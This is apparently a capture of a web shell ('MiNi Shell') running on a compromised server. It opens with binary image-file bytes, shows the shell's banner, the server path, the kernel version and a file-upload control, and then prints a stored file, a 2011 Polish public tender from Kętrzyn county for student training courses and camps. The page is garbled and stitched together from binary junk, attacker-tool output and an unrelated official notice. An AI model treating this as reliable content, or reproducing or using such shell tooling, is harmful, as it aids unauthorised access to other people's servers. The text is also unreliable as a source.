JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110316/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110316/86117-N-2011.html

<p class="kh_header"><b>Kętrzyn: Organizacja szkoleń specjalistycznych, szkoleń językowych oraz szkoleń zawodowych dla uczniów szkół ponadgimnazjalnych Powiatu Kętrzyńskiego w projekcie Pt. Wykorzystaj szansę 2</b><br>
<b>Numer ogłoszenia: 86117 - 2011; data zamieszczenia: 16.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu w Kętrzynie , Plac Grunwaldzki 1, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 7517500, 7511690, faks 089 7512401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.warmia.mazury.pl/powiat_ketrzynski/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja szkoleń specjalistycznych, szkoleń językowych oraz szkoleń zawodowych dla uczniów szkół ponadgimnazjalnych Powiatu Kętrzyńskiego w projekcie Pt. Wykorzystaj szansę 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Określenie przedmiotu oraz wielkości lub zakresu zamówienia: Przedmiot  zamówienia stanowią poniżej wymienione i szczegółowo opisane zadania, na które należy  złożyć ofertę:

Zadanie 1

Organizacja trzydniowej praktyki zawodowej w Hotelu Gołębiewski w Mikołajkach celem zapoznania się ze strukturą i funkcjonowaniem hotelu w miesiącu kwietniu 2011 r.
1.	Wykonawca zapewnia dla 22 uczestników (20 uczniów ze szkół ponadgimnazjalnych i 2 opiekunów):
1)	transport, w tym płatne parkingi,
2)	dwa noclegi w Mikołajkach lub okolicy, 
3)	pełne wyżywienie (2 śniadania, 3 obiady, 2 kolacje),  
4)	ubezpieczenie grupowe NNW na podstawie imiennego wykazu uczestników przesłanego przez Zamawiającego,
5)	bezpieczne i higieniczne warunki dla uczestników.
2.	Rozpoczęcie i zakończenie podróży nastąpi w Kętrzynie - parking przy Powiatowym Centrum Edukacyjnym w Kętrzynie, ul. Poznańska 21, 11-400 Kętrzyn.
3.	Zamawiający zapewnia opiekunów dla uczniów we własnym zakresie.

Zadanie 2

Przeprowadzenie specjalistycznego kursu SEP - eksploatacja instalacji i urządzeń pod napięciem do 1 kV dla dwóch grup po 15 uczniów szkoły ponadgimnazjalnej kształcącej w kierunku technik elektryk w terminach: IV-VI.2011 r. oraz IV-VI.2012 r. 
1.	Program kursu powinien obejmować w szczególności następujące zagadnienia:
.	Prawo energetyczne i przepisy z nim związane. 
.	Warunki techniczne jakim powinny odpowiadać instalacje i urządzenia elektroenergetyczne.
.	Zasady budowy i eksploatacji: sieci, urządzeń i instalacji o napięciu znamionowym do 1kV. 
.	Zasady budowy i eksploatacji urządzeń elektrotermicznych. 
.	Zasady budowy i eksploatacji sieci elektrycznego oświetlenia ulicznego.
.	Ochrona przeciwporażeniowa w urządzeniach do 1kV. 
.	Bezpieczeństwo i higiena pracy przy urządzeniach elektroenergetycznych. 
.	Ratowanie osób porażonych prądem elektrycznym. 
.	Ochrona przeciwpożarowa.
2.	Przeprowadzenie egzaminu sprawdzającego kwalifikacje na stanowiskach eksploatacji zakończonego wydaniem świadectwa kwalifikacyjnego. Sprawdzanie kwalifikacji dokonywane zgodnie z wymienionymi niżej aktami prawnymi: 
.	Ustawa z dn. 10.04.1997 r. - Prawo energetyczne (t. j. Dz. U. z 2006 r. Nr 89, poz. 625 ze zm.)
.	 Uczestnik szkolenia, po pozytywnie zdanym egzaminie, uzyskuje świadectwo kwalifikacyjne do obsługi, konserwacji, remontu, montażu uprawniające do wykonywania pracy na stanowisku eksploatacji, zgodnie z rozporządzeniem Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003 r. w sprawie szczegółowych zasad stwierdzenia posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2003r. Nr 89 poz.828 ze zm.).
3.	Kurs oraz egzaminy zostaną przeprowadzone w pracowniach Centrum Kształcenia Praktycznego Zespołu Szkół im. Marii Curie Skłodowskiej w Kętrzynie, ul. Wojska Polskiego 12, 11-400 Kętrzyn. 

Zadanie 3

Przeprowadzenie specjalistycznego kursu InsERT - przygotowanie do egzaminu zawodowego z obsługi programu finansowo-księgowego czterech grup po 10 uczniów szkoły ponadgimnazjalnej kształcącej w kierunku technik ekonomista w terminach: III-IV.2011 r. (2 grupy) oraz III-IV.2012 r. (2 grupy). 
1.	Program kursu powinien obejmować w szczególności następujące zagadnienia:
.	Zapoznanie uczniów z obsługą oprogramowania InsERT
.	Oswojenie się z arkuszami egzaminacyjnymi z wykorzystaniem oprogramowania InsERT
.	Powtórzenie wiedzy ekonomicznej niezbędnej do obsługi oprogramowania
.	Przygotowanie uczniów do egzaminu zawodowego (tematyka szkoleń dostosowana do wymagań egzaminacyjnych MEN i CKE)
.	Przeprowadzenie próbnego egzaminu zawodowego
2.	Warsztaty prowadzone przez doświadczonych trenerów i serwisantów InsERT zgodnie z wymogami MEN i CKE w formie praktycznej przy użyciu oprogramowania InsERT.
3.	Kursy zostaną przeprowadzone w pracowniach komputerowych Powiatowego Centrum Edukacyjnego w Kętrzynie, ul. Poznańska 21, 11-400 Kętrzyn wyposażonych w oprogramowanie InsERT. 

Zadanie 4

Organizacja 14-dniowego obozu językowego - jęz. angielski, dla 6 grup 15-osobowych w miejscowości nadmorskiej. Pierwszy obóz dla 3 grup 15-osobowych w pierwszej połowie lipca 2011 r., drugi obóz dla 3 grup 15-osobowych w pierwszej połowie lipca 2012 r. Uczestnikami kursu będzie młodzież ze szkół ponadgimnazjalnych (w sumie 90 osób). 
1.	Wykonawca zapewnia dla uczestnikom:
1)	transport, 
2)	zakwaterowanie w ośrodku wypoczynkowym w miejscowości nadmorskiej (pokoje z pełnym węzłem sanitarnym),
3)	pełne wyżywienie (3 posiłki dziennie plus deser, suchy prowiant)
4)	lektorów języka angielskiego (również native speakers), posiadających niezbędne uprawnienia,
5)	co najmniej 40 godz. lekcyjnych, w tym warsztaty,
6)	materiały dydaktyczne i pomoce audiowizualne,
7)	certyfikat po zakończeniu nauki,
8)	opiekę pedagogiczną i medyczną, ubezpieczenie grupowe NNW na podstawie imiennego wykazu uczestników przesłanego przez Zamawiającego,
9)	bezpieczne i higieniczne warunki pobytu dla uczestników,
10)	dodatkowy program rekreacyjny (wszystkie wstępy),
11)	ośrodek musi dysponować salami umożliwiającymi prowadzenie zajęć dydaktycznych dla każdej z grup uczniów.

2.	Rozpoczęcie i zakończenie podróży nastąpi w Kętrzynie - parking przy Starostwie Powiatowym w Kętrzynie, Plac Grunwaldzki 1, 11-400 Kętrzyn.

Zadanie 5

Organizacja dwóch 10 - dniowych obozów z kursem na młodszego ratownika WOPR, na potrzeby realizacji projektu Wykorzystaj szansę 2. Pierwszy obóz  dla 10 osób w pierwszej połowie lipca 2011 roku, drugi obóz  dla 10 osób w pierwszej połowie lipca 2012 roku. Uczestnikami kursu będzie młodzież szkół ponadgimnazjalnych (w sumie 20 osób).     
1.	Wykonawca zapewnia uczestnikom:
1)	transport,
2)	zakwaterowanie (pokoje z pełnym węzłem sanitarnym), 
3)	pełne wyżywienie (3 posiłki dziennie plus deser, suchy prowiant),
4)	trenerów z odpowiednimi kwalifikacjami,
5)	standardowy program szkolenia zgodnie z wymaganiami WOPR (zajęcia teoretyczne i praktyczne, w tym: profilaktyka, organizacja pracy ratowników WOPR, pierwsza pomoc, pływanie i techniki ratownictwa wodnego),
6)	materiały dydaktyczne i pomocnicze, 
7)	egzamin na młodszego ratownika, w tym koszty związane z egzaminem,
8)	certyfikat ukończenia kursu (w przypadku nie zdania egzaminu),
9)	legitymację młodszego ratownika WOPR,
10)	opiekę pedagogiczną i medyczną, ubezpieczenie grupowe NNW na podstawie imiennego wykazu uczestników przesłanego przez Zamawiającego,
11)	dodatkowy program rekreacyjny.
2.	Rozpoczęcie i zakończenie podróży nastąpi w Kętrzynie - parking przy Starostwie Powiatowym w Kętrzynie, Plac Grunwaldzki 1, 11-400 Kętrzyn.

Zadanie 6

Organizacja trzydniowej praktyki zawodowej w Centrum Szkoleniowym w Stąporkowie w miesiącu wrześniu 2011r.

1.Wykonawca zapewnia dla 28 uczestników (25 uczniów i 3 opiekunów):
1)	transport, w tym płatne parkingi,
2)	dwa noclegi w Stąporkowie lub okolicy,
3)	pełne wyżywienie (2 śniadania, 3 obiady, 2 kolacje, suchy prowiant),
4)	zajęcia praktyczne i teoretyczne z zakresu budownictwa w Centrum Szkoleniowym w Stąporkowie,
5)	ubezpieczenie grupowe NNW na podstawie imiennego wykazu uczestników przesłanego przez Zamawiającego,
6)	bezpieczne i higieniczne warunki dla uczestników.
2.	Rozpoczęcie i zakończenie podróży nastąpi w Kętrzynie - parking przy Powiatowym Centrum Edukacyjnym w Kętrzynie, ul. Poznańska 21, 11-400 Kętrzyn.
Zamawiający zapewnia opiekunów dla uczniów we własnym zakresie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2, 80.53.00.00-8, 80.58.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony gdy Wykonawca oświadczy, że posiada uprawnienia do prowadzenia określonej działalności składając oświadczenie będące Załącznikiem Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony gdy wykonawca oświadczy, 
że posiada wiedzę i doświadczenie pozwalające na prawidłową realizację zamówienia oraz wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w tym okresie min. 1 usługę polegającą na organizacji min. 4 dniowej kursu/praktyki dla min. 15 osób o wartości min. 20 000,00 zł oraz że zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony gdy Wykonawca oświadczy, 
że dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia składając oświadczenie stanowiące Załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony gdy Wykonawca oświadczy, 
że dysponuje odpowiednimi osobami zdolnymi do wykonania zamówienia składając oświadczenie stanowiące Załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek jest spełniony gdy Wykonawca oświadczy, 
że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia i wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i posiada opłaconą polisę ubezpieczeniową o wartości min. 50 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty wraz załącznikami</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamiany umowy mogą dotyczyć :
1)	zmiany liczby uczestników,
2)	zmiany terminów wyjazdów, 
3)	zmiany liczby dni wyjazdów,
4)	zmiany harmonogramu wyjazdu,
5)	zmiany stawki VAT.
Warunki zmian zostały określone we wzorze umowy, stanowiącym załącznik nr 3. do SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.warmia.mazury.pl/powiat_ketrzynski/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Kętrzynie Plac Grunwaldzki 1, 11-400 Kętrzyn, pokój nr 63.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2011 godzina 11:00, miejsce: Starostwo Powiatowe w Kętrzynie Plac Grunwaldzki 1, 11-400 Kętrzyn, pokój nr: 52 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Wykorzystaj szansę 2 realizowany przez Starostwo Powiatowe w Kętrzynie jest współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com